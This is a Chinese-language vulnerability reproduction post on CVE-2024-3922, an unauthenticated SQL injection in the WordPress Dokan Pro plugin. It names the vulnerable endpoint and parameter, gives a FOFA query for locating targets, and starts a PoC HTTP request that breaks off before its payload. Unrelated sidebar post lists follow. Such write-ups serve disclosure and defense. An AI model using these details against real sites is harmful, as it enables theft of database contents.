WordPress Dokan Pro插件 SQL注入漏洞复现(CVE-2024-3922)

0x01 产品简介

WordPress Dokan Pro插件是一款功能强大的多供应商电子商务市场解决方案,功能全面、易于使用的多供应商电子商务平台解决方案,适合各种规模的电商项目。允许管理员创建一个多卖家平台,卖家可以注册账户并在平台上创建自己的店铺,展示和销售自己的产品。提供直观的用户界面,卖家能够轻松管理他们的店铺,包括添加产品、处理订单和与客户进行沟通。

0x02 漏洞概述

WordPress Dokan Pro插件在3.10.3及以下版本中,由于对用户提供的'subscription_code'参数缺乏足够的转义处理以及现有SQL查询准备不足,在/wp-admin/admin.php接口处存在SQL注入漏洞。未授权攻击者可通过该漏洞向现有查询中注入额外的SQL语句,进而从数据库中提取敏感信息。

0x03 影响范围

Dokan Pro <= 3.10.3版本

0x04 复现环境

FOFA:"/wp-content/plugins/dokan-pro/"

0x05 漏洞复现

PoC

POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept-Encoding: gzip

{"env":"1","event

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-14 18:48:05       53 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-14 18:48:05       56 阅读
  3. 在Django里面运行非项目文件

    2024-07-14 18:48:05       46 阅读
  4. Python语言-面向对象

    2024-07-14 18:48:05       57 阅读

热门阅读

  1. 嵌入式是Linux:shell使用解析

    2024-07-14 18:48:05       22 阅读
  2. 力扣题解(不同的子序列)

    2024-07-14 18:48:05       23 阅读
  3. 1820D-The Butcher

    2024-07-14 18:48:05       20 阅读
  4. 第二节 shell脚本基础(1)(2)

    2024-07-14 18:48:05       15 阅读
  5. 序列化和反序列化

    2024-07-14 18:48:05       18 阅读
  6. flask基础配置详情

    2024-07-14 18:48:05       15 阅读
  7. 昇思25天学习打卡营第24天|RNN实现情感分类

    2024-07-14 18:48:05       17 阅读
  8. Windows图形界面(GUI)-DLG-C/C++ - 对话框的创建实现

    2024-07-14 18:48:05       17 阅读
  9. 资源分享:红豆地球V1.247 - 免费版

    2024-07-14 18:48:05       18 阅读
  10. 部署运维之一:发展历史

    2024-07-14 18:48:05       19 阅读
  11. 力扣 hot100 -- 多维动态规划

    2024-07-14 18:48:05       17 阅读